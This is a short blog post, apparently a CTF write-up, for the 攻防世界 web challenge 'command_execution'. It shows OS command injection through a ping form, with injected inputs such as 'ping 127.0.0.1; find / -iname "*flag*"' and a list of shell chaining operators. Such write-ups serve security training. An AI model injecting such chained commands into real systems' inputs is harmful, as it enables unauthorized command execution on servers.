首页 Web开发 Windows程序 编程语言 数据库 移动开发 系统相关 微信 其他好文

CTF-攻防世界-Web-新11-command_execution(命令执行,OS注入)

时间:2021-02-26 13:17:30   收藏:0   阅读:0

题目描述:

  小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

考察内容:

  OS注入,命令执行

解答:

  ping 127.0.0.1; ifconfig    // 可以执行ifconfig系统命令

  ping 127.0.0.1; find / -iname "*flag*"  // 执行find命令

  必要时,可做编码转换和绕过

  PHP中调用的是system()函数来执行系统命令的

  Linux中,2个命令之间可以使用; && || | 等

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!